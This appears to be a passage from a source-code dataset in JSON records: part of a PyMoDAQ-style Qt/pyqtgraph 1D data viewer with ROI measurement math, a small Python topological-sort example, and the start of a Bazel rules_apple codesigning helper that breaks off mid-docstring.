self.ui.aspect_ratio_pb.setCheckable(True)\n button_widget.addAction(self.ui.aspect_ratio_pb)\n\n self.ui.scatter = QAction(QIcon(QPixmap(\":/icons/Icon_Library/Marker.png\")),\n 'Switch between line or scatter plots')\n self.ui.scatter.setCheckable(True)\n button_widget.addAction(self.ui.scatter)\n\n self.ui.xyplot_action = QAction(QIcon(QPixmap(\":/icons/Icon_Library/2d.png\")),\n 'Switch between normal or XY representation (valid for 2 channels)')\n self.ui.xyplot_action.setCheckable(True)\n button_widget.addAction(self.ui.xyplot_action)\n self.ui.xyplot_action.setVisible(False)\n\n self.ui.x_label = QAction('x:')\n button_widget.addAction(self.ui.x_label)\n\n self.ui.y_label = QAction('y:')\n button_widget.addAction(self.ui.y_label)\n\n\n def setup_zoom(self):\n # create and set the zoom widget\n # self.ui.zoom_widget=Dock(\"1DViewer zoom\", size=(300, 100), closable=True)\n self.ui.zoom_widget = QtWidgets.QWidget()\n layout = QtWidgets.QHBoxLayout()\n\n self.ui.Graph_zoom = pg.PlotWidget()\n layout.addWidget(self.ui.Graph_zoom)\n self.ui.zoom_widget.setLayout(layout)\n\n self.ui.zoom_region = pg.LinearRegionItem()\n self.ui.zoom_region.setZValue(-10)\n self.ui.zoom_region.setBrush('r')\n self.ui.zoom_region.setOpacity(0.2)\n self.ui.Graph_zoom.addItem(self.ui.zoom_region)\n self.zoom_plot = []\n # self.dockarea.addDock(self.ui.zoom_widget)\n self.ui.zoom_widget.setVisible(False)\n\n def do_scatter(self):\n self.update_graph1D(self.datas)\n\n def do_xy(self):\n if self.ui.xyplot_action.isChecked():\n axis = self.viewer.plotwidget.plotItem.getAxis('bottom')\n axis.setLabel(text=self.labels[0], units='')\n axis = self.viewer.plotwidget.plotItem.getAxis('left')\n axis.setLabel(text=self.labels[1], units='')\n self.legend.setVisible(False)\n else:\n self.set_axis_label(dict(orientation='bottom', label=self.axis_settings['label'],\n units=self.axis_settings['units']))\n axis = self.viewer.plotwidget.plotItem.getAxis('left')\n axis.setLabel(text='', units='')\n self.legend.setVisible(True)\n self.update_graph1D(self.datas)\n\n def update_lineouts(self):\n try:\n operations = []\n channels = []\n for ind, key in enumerate(self.roi_manager.ROIs):\n operations.append(self.roi_manager.settings.child('ROIs', key, 'math_function').value())\n channels.append(\n self.roi_manager.settings.child('ROIs', key,\n 'use_channel').opts['limits'].index(\n self.roi_manager.settings.child('ROIs',\n key, 'use_channel').value()))\n self.lo_items[key].setPen(self.roi_manager.settings.child('ROIs', key,\n 'Color').value())\n\n self.measurement_dict['datas'] = self.datas\n self.measurement_dict['ROI_bounds'] = [self.roi_manager.ROIs[item].getRegion() for item in\n self.roi_manager.ROIs]\n self.measurement_dict['channels'] = channels\n self.measurement_dict['operations'] = operations\n\n data_lo = self.math_module.update_math(self.measurement_dict)\n self.show_math(data_lo)\n except Exception as e:\n pass\n\n @pyqtSlot(str)\n def remove_ROI(self, roi_name):\n\n item = self.lo_items.pop(roi_name)\n self.ui.Graph_Lineouts.plotItem.removeItem(item)\n self.measure_data_dict.pop(\"Lineout_{:s}:\".format(roi_name))\n self.update_lineouts()\n\n @pyqtSlot(int, str)\n def add_lineout(self, index, roi_type=''):\n try:\n item = self.roi_manager.ROIs['ROI_{:02d}'.format(index)]\n item_param = self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(index))\n item_param.child(('use_channel')).setOpts(limits=self.labels)\n if len(self.labels) == 0: # pragma: no cover\n lab = ''\n else:\n lab = self.labels[0]\n 
item_param.child(('use_channel')).setValue(lab)\n item.sigRegionChanged.connect(self.update_lineouts)\n item.sigRegionChangeFinished.connect(self.ROI_changed_finished.emit)\n for child in putils.iter_children_params(item_param, childlist=[]):\n if child.type() != 'group':\n child.sigValueChanged.connect(self.update_lineouts)\n\n item_lo = self.ui.Graph_Lineouts.plot()\n item_lo.setPen(item_param.child(('Color')).value())\n self.lo_items['ROI_{:02d}'.format(index)] = item_lo\n self.lo_data = OrderedDict([])\n for k in self.lo_items:\n self.lo_data[k] = np.zeros((1,))\n self.update_lineouts()\n except Exception as e:\n logger.exception(str(e))\n\n def clear_lo(self):\n self.lo_data = [[] for ind in range(len(self.lo_data))]\n self.update_lineouts()\n\n def crosshairClicked(self):\n if self.ui.crosshair_pb.isChecked():\n self.ui.crosshair.setVisible(True)\n self.ui.x_label.setVisible(True)\n self.ui.y_label.setVisible(True)\n range = self.viewer.plotwidget.plotItem.vb.viewRange()\n self.ui.crosshair.set_crosshair_position(xpos=np.mean(np.array(range[0])))\n else:\n self.ui.crosshair.setVisible(False)\n self.ui.x_label.setVisible(False)\n self.ui.y_label.setVisible(False)\n\n def do_math_fun(self):\n try:\n if self.ui.Do_math_pb.isChecked():\n self.roi_manager.roiwidget.show()\n self.ui.Graph_Lineouts.show()\n\n else:\n self.ui.Graph_Lineouts.hide()\n self.roi_manager.roiwidget.hide()\n\n except Exception as e:\n logger.exception(str(e))\n\n def do_zoom(self):\n bounds = self.ui.zoom_region.getRegion()\n self.viewer.plotwidget.setXRange(bounds[0], bounds[1])\n\n def enable_zoom(self):\n try:\n if not (self.ui.zoom_pb.isChecked()):\n if self.zoom_plot != []:\n for plot in self.zoom_plot:\n self.ui.Graph_zoom.removeItem(plot)\n self.ui.zoom_widget.hide()\n self.ui.zoom_region.sigRegionChanged.disconnect(self.do_zoom)\n\n else:\n self.zoom_plot = []\n for ind, data in enumerate(self.datas):\n channel = self.ui.Graph_zoom.plot()\n channel.setPen(self.plot_colors[ind])\n self.zoom_plot.append(channel)\n self.update_graph1D(self.datas)\n self.ui.zoom_region.setRegion([np.min(self._x_axis), np.max(self._x_axis)])\n\n self.ui.zoom_widget.show()\n self.ui.zoom_region.sigRegionChanged.connect(self.do_zoom)\n except Exception as e:\n logger.exception(str(e))\n\n def ini_data_plots(self, Nplots):\n try:\n self.plot_channels = []\n # if self.legend is not None:\n # self.viewer.plotwidget.plotItem.removeItem(self.legend)\n self.legend = self.viewer.plotwidget.plotItem.legend\n flag = True\n while flag:\n items = [item[1].text for item in self.legend.items]\n if len(items) == 0:\n flag = False\n else:\n self.legend.removeItem(items[0])\n channels = []\n for ind in range(Nplots):\n channel = self.viewer.plotwidget.plot()\n channel.setPen(self.plot_colors[ind])\n self.legend.addItem(channel, self._labels[ind])\n channels.append(ind)\n self.plot_channels.append(channel)\n except Exception as e:\n logger.exception(str(e))\n\n def update_labels(self, labels=[]):\n try:\n labels_tmp = labels[:]\n if self.labels == labels:\n if self.labels == [] or len(self.labels) < len(self.datas):\n self._labels = [\"CH{}\".format(ind) for ind in range(len(self.datas))]\n else:\n if self.legend is not None:\n flag = True\n while flag:\n items = [item[1].text for item in self.legend.items]\n if len(items) == 0:\n flag = False\n else:\n self.legend.removeItem(items[0])\n\n if len(labels) < len(self.plot_channels):\n for ind in range(len(labels), len(self.plot_channels)):\n labels_tmp.append('CH{:02d}'.format(ind))\n\n if 
len(labels_tmp) == len(self.plot_channels):\n for ind, channel in enumerate(self.plot_channels):\n self.legend.addItem(channel, labels_tmp[ind])\n\n self._labels = labels_tmp\n\n if self.labels != labels:\n for ind in range(len(self.roi_manager.ROIs)):\n val = self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(ind), 'use_channel').value()\n self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(ind), 'use_channel').setOpts(\n limits=self.labels)\n if val not in self.labels:\n self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(ind), 'use_channel').setValue(\n self.labels[0])\n\n self.ui.xyplot_action.setVisible(len(self.labels) == 2)\n\n\n except Exception as e:\n logger.exception(str(e))\n\n @property\n def labels(self):\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n self.update_labels(labels)\n self._labels = labels\n\n def lock_aspect_ratio(self):\n if self.ui.aspect_ratio_pb.isChecked():\n self.viewer.plotwidget.plotItem.vb.setAspectLocked(lock=True, ratio=1)\n else:\n self.viewer.plotwidget.plotItem.vb.setAspectLocked(lock=False)\n\n def open_measurement_module(self):\n if not (self.ui.Do_math_pb.isChecked()):\n self.ui.Do_math_pb.setChecked(True)\n QtWidgets.QApplication.processEvents()\n self.ui.Do_math_pb.clicked.emit()\n QtWidgets.QApplication.processEvents()\n\n self.ui.Measurement_widget.setVisible(True)\n if self.ui.do_measurements_pb.isChecked():\n Form = self.ui.Measurement_widget\n self.measurement_module = DAQ_Measurement(Form)\n # self.ui.Measurement_widget.addWidget(Form)\n self.measurement_module.measurement_signal[list].connect(self.show_measurement)\n self.update_measurement_module()\n\n elif self.measurement_module is not None:\n self.measurement_module.Quit_fun()\n\n def remove_plots(self):\n if self.plot_channels is not None:\n for channel in self.plot_channels:\n self.viewer.plotwidget.removeItem(channel)\n self.plot_channels = None\n if self.legend is not None:\n self.viewer.plotwidget.removeItem(self.legend)\n\n def set_axis_label(self, axis_settings=dict(orientation='bottom', label='x axis', units='pxls')):\n axis = self.viewer.plotwidget.plotItem.getAxis(axis_settings['orientation'])\n axis.setLabel(text=axis_settings['label'], units=axis_settings['units'])\n self.axis_settings = axis_settings\n\n @pyqtSlot(list)\n def show_data(self, datas, labels=None, x_axis=None):\n try:\n self.datas = datas\n self.update_labels(self.labels)\n\n self.data_to_export = OrderedDict(name=self.title, data0D=OrderedDict(), data1D=OrderedDict(), data2D=None)\n for ind, data in enumerate(datas):\n self.data_to_export['data1D']['CH{:03d}'.format(ind)] = utils.DataToExport()\n\n if self.plot_channels == [] or self.plot_channels is None: # initialize data and plots\n self.ini_data_plots(len(datas))\n\n elif len(self.plot_channels) != len(datas):\n self.remove_plots()\n self.ini_data_plots(len(datas))\n\n self.update_graph1D(datas)\n\n if x_axis is not None:\n self.x_axis = x_axis\n\n if labels is not None:\n self.update_labels(labels)\n\n if self.ui.do_measurements_pb.isChecked():\n self.update_measurement_module()\n\n except Exception as e:\n logger.exception(str(e))\n\n @pyqtSlot(list)\n def show_data_temp(self, datas):\n \"\"\"f\n to plot temporary data, for instance when all pixels are not yet populated...\n \"\"\"\n try:\n self.update_labels(self.labels)\n self.datas = datas\n\n if self.plot_channels is None: # initialize data and plots\n self.ini_data_plots(len(datas))\n elif len(self.plot_channels) != len(datas):\n 
self.remove_plots()\n self.ini_data_plots(len(datas))\n\n for ind_plot, data in enumerate(datas):\n if self.x_axis is None:\n self.x_axis = np.linspace(0, len(data), len(data), endpoint=False)\n x_axis = self.x_axis\n elif len(self.x_axis) != len(data):\n x_axis = np.linspace(0, len(data), len(data), endpoint=False)\n else:\n x_axis = self.x_axis\n\n self.plot_channels[ind_plot].setData(x=x_axis, y=data)\n except Exception as e:\n logger.exception(str(e))\n\n @pyqtSlot(list)\n def show_math(self, data_lo):\n # self.data_to_export=OrderedDict(x_axis=None,y_axis=None,z_axis=None,data0D=None,data1D=None,data2D=None)\n if len(data_lo) != 0:\n for ind, key in enumerate(self.lo_items):\n self.measure_data_dict[\"Lineout_{:s}:\".format(key)] = data_lo[ind]\n self.data_to_export['data0D']['Measure_{:03d}'.format(ind)] = utils.DataToExport(name=self.title,\n data=data_lo[ind],\n source='roi')\n self.roi_manager.settings.child(('measurements')).setValue(self.measure_data_dict)\n\n for ind, key in enumerate(self.lo_items):\n self.lo_data[key] = np.append(self.lo_data[key], data_lo[ind])\n self.lo_items[key].setData(y=self.lo_data[key])\n\n if not (self.ui.do_measurements_pb.isChecked()): # otherwise you export data from measurement\n self.data_to_export['acq_time_s'] = datetime.datetime.now().timestamp()\n self.data_to_export_signal.emit(self.data_to_export)\n\n @pyqtSlot(list)\n def show_measurement(self, data_meas):\n ind_offset = len(self.data_to_export['data0D'])\n for ind, res in enumerate(data_meas):\n self.measure_data_dict[\"Meas.{}:\".format(ind)] = res\n self.data_to_export['data0D']['Measure_{:03d}'.format(ind + ind_offset)] = \\\n utils.DataToExport(name=self.title, data=res, source='roi')\n self.roi_manager.settings.child('measurements').setValue(self.measure_data_dict)\n self.data_to_export['acq_time_s'] = datetime.datetime.now().timestamp()\n self.data_to_export_signal.emit(self.data_to_export)\n\n def update_crosshair_data(self, posx, posy, name=\"\"):\n try:\n indx = utils.find_index(self._x_axis, posx)[0][0]\n\n string = \"y=\"\n for data in self.datas:\n string += \"{:.6e} / \".format(data[indx])\n self.ui.y_label.setText(string)\n self.ui.x_label.setText(\"x={:.6e} \".format(posx))\n\n except Exception as e:\n pass\n\n def update_graph1D(self, datas):\n # self.data_to_export=OrderedDict(data0D=OrderedDict(),data1D=OrderedDict(),data2D=None)\n try:\n\n pens = []\n symbolBrushs = []\n symbolSize = 5\n for ind, ch in enumerate(self.plot_channels):\n if self.ui.scatter.isChecked():\n pens.append(None)\n symbol = 'o'\n symbolBrushs.append(self.plot_colors[ind])\n else:\n pens.append(self.plot_colors[ind])\n symbol = None\n\n symbolBrushs.append(None)\n\n if self.x_axis is None:\n self._x_axis = np.linspace(0, len(datas[0]), len(datas[0]), endpoint=False)\n elif len(self.x_axis) != len(datas[0]):\n self._x_axis = np.linspace(0, len(datas[0]), len(datas[0]), endpoint=False)\n\n for ind_plot, data in enumerate(datas):\n if not self.ui.xyplot_action.isChecked() or len(datas) == 0:\n self.plot_channels[ind_plot].setData(x=self.x_axis, y=data, pen=pens[ind_plot], symbol=symbol,\n symbolBrush=symbolBrushs[ind_plot], symbolSize=symbolSize,\n pxMode=True)\n else:\n self.plot_channels[ind_plot].setData(x=np.array([]), y=np.array([]), pen=pens[ind_plot], symbol=symbol,\n symbolBrush=symbolBrushs[ind_plot], symbolSize=symbolSize,\n pxMode=True)\n if self.ui.zoom_pb.isChecked():\n self.zoom_plot[ind_plot].setData(x=self.x_axis, y=data)\n x_axis = utils.Axis(data=self.x_axis, 
units=self.axis_settings['units'],\n label=self.axis_settings['label'])\n self.data_to_export['data1D']['CH{:03d}'.format(ind_plot)].update(\n OrderedDict(name=self.title, data=data, x_axis=x_axis, source='raw')) # to be saved or exported\n\n if self.ui.xyplot_action.isChecked() and len(datas) > 1:\n self.plot_channels[0].setData(x=datas[0], y=datas[1], pen=pens[0], symbol=symbol,\n symbolBrush=symbolBrushs[0], symbolSize=symbolSize,\n pxMode=True)\n\n if not self.ui.Do_math_pb.isChecked(): # otherwise math is done and then data is exported\n self.data_to_export['acq_time_s'] = datetime.datetime.now().timestamp()\n self.data_to_export_signal.emit(self.data_to_export)\n else:\n self.measurement_dict['datas'] = datas\n if self.measurement_dict['x_axis'] is None:\n self.measurement_dict['x_axis'] = self._x_axis\n data_lo = self.math_module.update_math(self.measurement_dict)\n self.show_math(data_lo)\n\n except Exception as e:\n logger.exception(str(e))\n\n def update_measurement_module(self):\n xdata = self.measurement_dict['x_axis']\n ydata = self.measurement_dict['datas'][0]\n if xdata is None:\n self.measurement_module.update_data(ydata=ydata)\n else:\n self.measurement_module.update_data(xdata=xdata, ydata=ydata)\n\n def update_status(self, txt):\n logger.info(txt)\n\n @property\n def x_axis(self):\n return self._x_axis\n\n @x_axis.setter\n def x_axis(self, x_axis):\n label = 'Pxls'\n units = ''\n if isinstance(x_axis, dict):\n if 'data' in x_axis:\n xdata = x_axis['data']\n if 'label' in x_axis:\n label = x_axis['label']\n if 'units' in x_axis:\n units = x_axis['units']\n else:\n xdata = x_axis\n self._x_axis = xdata\n self.measurement_dict['x_axis'] = self._x_axis\n if self.datas != []:\n self.show_data_temp(self.datas)\n self.set_axis_label(dict(orientation='bottom', label=label, units=units))\n\n\nclass Viewer1D_math(QObject):\n status_sig = pyqtSignal(list)\n\n def __init__(self):\n super(QObject, self).__init__()\n self.datas = []\n self.ROI_bounds = []\n self.x_axis = None\n self.operations = []\n self.channels = []\n\n def update_math(self, measurement_dict):\n try:\n if 'datas' in measurement_dict:\n self.datas = measurement_dict['datas']\n if 'ROI_bounds' in measurement_dict:\n self.ROI_bounds = measurement_dict['ROI_bounds']\n if 'x_axis' in measurement_dict:\n self.x_axis = measurement_dict['x_axis']\n if 'operations' in measurement_dict:\n self.operations = measurement_dict['operations']\n if 'channels' in measurement_dict:\n self.channels = measurement_dict['channels']\n\n # self.status_sig.emit([\"Update_Status\",\"doing math\"])\n data_lo = []\n for ind_meas in range(len(self.operations)):\n indexes = utils.find_index(self.x_axis, self.ROI_bounds[ind_meas])\n ind1 = indexes[0][0]\n ind2 = indexes[1][0]\n sub_data = self.datas[self.channels[ind_meas]][ind1:ind2]\n sub_xaxis = self.x_axis[ind1:ind2]\n\n if self.operations[ind_meas] == \"Mean\":\n data_lo.append(float(np.mean(sub_data)))\n elif self.operations[ind_meas] == \"Sum\":\n data_lo.append(float(np.sum(sub_data)))\n elif self.operations[ind_meas] == 'half-life' or self.operations[ind_meas] == 'expotime':\n ind_x0 = utils.find_index(sub_data, np.max(sub_data))[0][0]\n x0 = sub_xaxis[ind_x0]\n sub_xaxis = sub_xaxis[ind_x0:]\n sub_data = sub_data[ind_x0:]\n offset = sub_data[-1]\n N0 = np.max(sub_data) - offset\n if self.operations[ind_meas] == 'half-life':\n time = sub_xaxis[utils.find_index(sub_data - offset, 0.5 * N0)[0][0]] - x0\n elif self.operations[ind_meas] == 'expotime':\n time = 
sub_xaxis[utils.find_index(sub_data - offset, 0.37 * N0)[0][0]] - x0\n data_lo.append(time)\n\n return data_lo\n except Exception as e:\n logger.exception(str(e))\n return []\n\n\nif __name__ == '__main__': # pragma: no cover\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QWidget()\n prog = Viewer1D(Form)\n\n from pymodaq.daq_utils.daq_utils import gauss1D\n\n x = np.linspace(0, 200, 201)\n y1 = gauss1D(x, 75, 25)\n y2 = gauss1D(x, 120, 50, 2)\n tau_half = 27\n tau2 = 100\n x0 = 50\n dx = 20\n ydata_expodec = np.zeros((len(x)))\n ydata_expodec[:50] = 1 * gauss1D(x[:50], x0, dx, 2)\n ydata_expodec[50:] = 1 * np.exp(-(x[50:] - x0) / (tau_half / np.log(2))) # +1*np.exp(-(x[50:]-x0)/tau2)\n ydata_expodec += 0.1 * np.random.rand(len(x))\n\n # x = np.sin(np.linspace(0,6*np.pi,201))\n # y = np.sin(np.linspace(0, 6*np.pi, 201)+np.pi/2)\n\n Form.show()\n prog.ui.Do_math_pb.click()\n QtWidgets.QApplication.processEvents()\n prog.x_axis = x\n # prog.show_data([y, y+2])\n prog.show_data([y1, y2, ydata_expodec])\n QtWidgets.QApplication.processEvents()\n prog.update_labels(['coucou', 'label2'])\n sys.exit(app.exec_())\n"} {"ext": "py", "sha": "1a2f4fa11d88a0f3f192fd7453d835cbb54f7831", "content": "# Author: Phyllipe Bezerra (https://github.com/pmba)\n\nclothes = {\n 0: \"underwear\",\n 1: \"pants\",\n 2: \"belt\",\n 3: \"suit\",\n 4: \"shoe\",\n 5: \"socks\",\n 6: \"shirt\",\n 7: \"tie\",\n 8: \"clock\",\n}\n\ngraph = [[1, 4], [2, 4], [3], [], [], [4], [2, 7], [3], []]\n\nvisited = [0 for x in range(len(graph))]\nstack = []\n\n\ndef print_stack(stack, clothes):\n order = 1\n while stack:\n cur_clothe = stack.pop()\n print(order, clothes[cur_clothe])\n order += 1\n\n\ndef dfs(u, visited, graph):\n visited[u] = 1\n for v in graph[u]:\n if not visited[v]:\n dfs(v, visited, graph)\n\n stack.append(u)\n\n\ndef top_sort(graph, visited):\n for v in range(len(graph)):\n if not visited[v]:\n dfs(v, visited, graph)\n\n\nif __name__ == \"__main__\":\n top_sort(graph, visited)\n print(stack)\n print_stack(stack, clothes)\n"} {"ext": "bzl", "sha": "1a2f4fd9aca8b324e74562a7cd5cb686149c0cd9", "content": "# Copyright 2018 The Bazel Authors. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Actions related to codesigning.\"\"\"\n\nload(\n \"@build_bazel_rules_apple//apple/internal/utils:defines.bzl\",\n \"defines\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal/utils:legacy_actions.bzl\",\n \"legacy_actions\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal:intermediates.bzl\",\n \"intermediates\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal:platform_support.bzl\",\n \"platform_support\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal:rule_support.bzl\",\n \"rule_support\",\n)\nload(\n \"@bazel_skylib//lib:paths.bzl\",\n \"paths\",\n)\nload(\n \"@bazel_skylib//lib:shell.bzl\",\n \"shell\",\n)\n\ndef _double_quote(raw_string):\n \"\"\"Add double quotes around the string and preserve existing quote characters.\n\n Args:\n raw_string: A string that might have shell-syntaxed environment variables.\n\n Returns:\n The string with double quotes.\n \"\"\"\n return \"\\\"\" + raw_string.replace(\"\\\"\", \"\\\\\\\"\") + \"\\\"\"\n\ndef _no_op(x):\n \"\"\"Helper that does not nothing be return the result.\"\"\"\n return x\n\ndef _codesign_args_for_path(\n ctx,\n path_to_sign,\n provisioning_profile,\n entitlements_file,\n shell_quote = True):\n \"\"\"Returns a command line for the codesigning tool wrapper script.\n\n Args:\n ctx: The Starlark context.\n path_to_sign: A struct indicating the path that should be signed and its\n optionality (see `_path_to_sign`).\n provisioning_profile: The provisioning profile file. May be `None`.\n entitlements_file: The entitlements file to pass to codesign. May be `None`\n for non-app binaries (e.g. test bundles).\n shell_quote: Sanitizes the arguments to be evaluated in a shell.\n\n Returns:\n The codesign command invocation for the given directory as a list.\n \"\"\"\n if not path_to_sign.is_directory and path_to_sign.signed_frameworks:\n fail(\"Internal Error: Received a list of signed frameworks as exceptions \" +\n \"for code signing, but path to sign is not a directory.\")\n\n for x in path_to_sign.signed_frameworks:\n if not x.startswith(path_to_sign.path):\n fail(\"Internal Error: Signed framework does not have the current path \" +\n \"to sign (%s) as its prefix (%s).\" % (path_to_sign.path, x))\n\n cmd_codesigning = [\n \"--codesign\",\n \"/usr/bin/codesign\",\n ]\n\n is_device = platform_support.is_device_build(ctx)\n\n # Add quotes for sanitizing inputs when they're invoked directly from a shell script, for\n # instance when using this string to assemble the output of codesigning_command.\n maybe_quote = shell.quote if shell_quote else _no_op\n maybe_double_quote = _double_quote if shell_quote else _no_op\n\n # First, try to use the identity passed on the command line, if any. 
If it's a simulator build,\n # use an ad hoc identity.\n identity = ctx.fragments.objc.signing_certificate_name if is_device else \"-\"\n if not identity:\n if provisioning_profile:\n cmd_codesigning.extend([\n \"--mobileprovision\",\n maybe_quote(provisioning_profile.path),\n ])\n\n else:\n identity = \"-\"\n\n if identity:\n cmd_codesigning.extend([\n \"--identity\",\n maybe_quote(identity),\n ])\n\n # The entitlements rule ensures that entitlements_file is None or a file\n # containing only \"com.apple.security.get-task-allow\" when building for the\n # simulator.\n if path_to_sign.use_entitlements and entitlements_file:\n cmd_codesigning.extend([\n \"--entitlements\",\n maybe_quote(entitlements_file.path),\n ])\n\n if is_device:\n cmd_codesigning.append(\"--force\")\n else:\n cmd_codesigning.extend([\n \"--force\",\n \"--disable_timestamp\",\n ])\n\n if path_to_sign.is_directory:\n cmd_codesigning.append(\"--directory_to_sign\")\n else:\n cmd_codesigning.append(\"--target_to_sign\")\n\n # Because the path does include environment variables which need to be expanded, path has to be\n # quoted using double quotes, this means that path can't be quoted using shell.quote.\n cmd_codesigning.append(maybe_double_quote(path_to_sign.path))\n\n if path_to_sign.signed_frameworks:\n for signed_framework in path_to_sign.signed_frameworks:\n # Signed frameworks must also be double quoted, as they too have an environment\n # variable to be expanded.\n cmd_codesigning.extend([\n \"--signed_path\",\n maybe_double_quote(signed_framework),\n ])\n\n return cmd_codesigning\n\ndef _path_to_sign(path, is_directory = False, signed_frameworks = [], use_entitlements = True):\n \"\"\"Returns a \"path to sign\" value to be passed to `_signing_command_lines`.\n\n Args:\n path: The path to sign, relative to wherever the code signing command lines\n are being executed.\n is_directory: If `True`, the path is a directory and not a bundle, indicating\n that the contents of each item in the directory should be code signed\n except for the invisible files prefixed with a period.\n signed_frameworks: If provided, a list of frameworks that have already been signed.\n use_entitlements: If provided, indicates if the entitlements on the bundling\n target should be used for signing this path (useful to disabled the use\n when signing frameworks within an iOS app).\n\n Returns:\n A `struct` that can be passed to `_signing_command_lines`.\n \"\"\"\n return struct(\n path = path,\n is_directory = is_directory,\n signed_frameworks = signed_frameworks,\n use_entitlements = use_entitlements,\n )\n\ndef _provisioning_profile(ctx):\n # Verify that a provisioning profile was provided for device builds on\n # platforms that require it.\n is_device = platform_support.is_device_build(ctx)\n provisioning_profile = getattr(ctx.file, \"provisioning_profile\", None)\n rule_descriptor = rule_support.rule_descriptor(ctx)\n if (is_device and\n rule_descriptor.requires_signing_for_device and\n not provisioning_profile):\n fail(\"The provisioning_profile attribute must be set for device \" +\n \"builds on this platform (%s).\" %\n platform_support.platform_type(ctx))\n return provisioning_profile\n\ndef _signing_command_lines(\n ctx,\n paths_to_sign,\n entitlements_file):\n \"\"\"Returns a multi-line string with codesign invocations for the bundle.\n\n For any signing identity other than ad hoc, the identity is verified as being\n valid in the keychain and an error will be emitted if the identity cannot be\n used for signing for any reason.\n\n 
Args:\n ctx: The Starlark context.\n paths_to_sign: A list of values returned from `path_to_sign` that indicate\n paths that should be code-signed.\n entitlements_file: The entitlements file to pass to codesign.\n\n Returns:\n A multi-line string with codesign invocations for the bundle.\n \"\"\"\n provisioning_profile = _provisioning_profile(ctx)\n\n commands = []\n\n # Use of the entitlements file is not recommended for the signing of frameworks. As long as\n # this remains the case, we do have to split the \"paths to sign\" between multiple invocations\n # of codesign.\n for path_to_sign in paths_to_sign:\n codesign_command = [ctx.executable._codesigningtool.path]\n codesign_command.extend(_codesign_args_for_path(\n ctx,\n path_to_sign,\n provisioning_profile,\n entitlements_file,\n ))\n commands.append(\" \".join(codesign_command))\n return \"\\n\".join(commands)\n\ndef _should_sign_simulator_bundles(ctx):\n \"\"\"Check if a main bundle should be codesigned.\n\n The Frameworks/* bundles should *always* be signed, this is just for\n the other bundles.\n\n Args:\n ctx: The Starlark context.\n\n Returns:\n True/False for if the bundle should be signed.\n\n \"\"\"\n rule_descriptor = rule_support.rule_descriptor(ctx)\n if not rule_descriptor.skip_simulator_signing_allowed:\n return True\n\n # Default is to sign.\n return defines.bool_value(\n ctx,\n \"apple.codesign_simulator_bundles\",\n True,\n )\n\ndef _should_sign_bundles(ctx):\n should_sign_bundles = True\n\n rule_descriptor = rule_support.rule_descriptor(ctx)\n codesigning_exceptions = rule_descriptor.codesigning_exceptions\n if (codesigning_exceptions ==\n rule_support.codesigning_exceptions.sign_with_provisioning_profile):\n # If the rule doesn't have a provisioning profile, do not sign the binary or its\n # frameworks.\n provisioning_profile = getattr(ctx.file, \"provisioning_profile\", None)\n if not provisioning_profile:\n should_sign_bundles = False\n elif codesigning_exceptions == rule_support.codesigning_exceptions.skip_signing:\n should_sign_bundles = False\n elif codesigning_exceptions != rule_support.codesigning_exceptions.none:\n fail(\"Internal Error: Encountered unsupported state for codesigning_exceptions.\")\n\n return should_sign_bundles\n\ndef _codesigning_args(\n ctx,\n entitlements,\n full_archive_path,\n is_framework = False):\n \"\"\"Returns a set of codesigning arguments to be passed to the codesigning tool.\n\n Args:\n ctx: The rule context.\n entitlements: The entitlements file to sign with. Can be None.\n full_archive_path: The full path to the codesigning target.\n is_framework: If the target is a framework. False by default.\n\n Returns:\n A list containing the arguments to pass to the codesigning tool.\n \"\"\"\n if not _should_sign_bundles(ctx):\n return []\n\n is_device = platform_support.is_device_build(ctx)\n if not is_framework and not is_device and not _should_sign_simulator_bundles(ctx):\n return []\n\n return _codesign_args_for_path(\n ctx,\n _path_to_sign(full_archive_path),\n provisioning_profile = _provisioning_profile(ctx),\n entitlements_file = entitlements,\n shell_quote = False,\n )\n\ndef _codesigning_command(\n ctx,\n entitlements,\n frameworks_path,\n signed_frameworks,\n bundle_path = \"\"):\n \"\"\"Returns a codesigning command that includes framework embedded bundles.\n\n Args:\n ctx: The rule context.\n entitlements: The entitlements file to sign with. 
Can be None.\n frameworks_path: The location of the Frameworks directory, relative to the archive.\n signed_frameworks: A depset containing each framework that has already been signed.\n bundle_path: The location of the bundle, relative to the archive.\n\n Returns:\n A string containing the codesigning commands.\n \"\"\"\n if not _should_sign_bundles(ctx):\n return \"\"\n\n paths_to_sign = []\n\n # The command returned by this function is executed as part of a bundling shell script.\n # Each directory to be signed must be prefixed by $WORK_DIR, which is the variable in that\n # script that contains the path to the directory where the bundle is being built.\n if frameworks_path:\n framework_root = paths.join(\"$WORK_DIR\", frameworks_path) + \"/\"\n full_signed_frameworks = []\n\n for signed_framework in signed_frameworks.to_list():\n full_signed_frameworks.append(paths.join(framework_root, signed_framework))\n\n paths_to_sign.append(\n _path_to_sign(\n framework_root,\n is_directory = True,\n signed_frameworks = full_signed_frameworks,\n use_entitlements = False,\n ),\n )\n\n is_device = platform_support.is_device_build(ctx)\n if is_device or _should_sign_simulator_bundles(ctx):\n path_to_sign = paths.join(\"$WORK_DIR\", bundle_path)\n paths_to_sign.append(\n _path_to_sign(path_to_sign),\n )\n return _signing_command_lines(\n ctx,\n paths_to_sign = paths_to_sign,\n entitlements_file = entitlements,\n )\n\ndef _post_process_and_sign_archive_action(\n ctx,\n archive_codesigning_path,\n frameworks_path,\n input_archive,\n output_archive,\n output_archive_root_path,\n signed_frameworks,\n entitlements = None):\n \"\"\"Post-processes and signs an archived bundle.\n\n Args:\n ctx: The target's rule context.\n archive_codesigning_path: The codesigning path relative to the archive.\n frameworks_path: The Frameworks path relative to the archive.\n input_archive: The `File` representing the archive containing the bundle\n that has not yet been 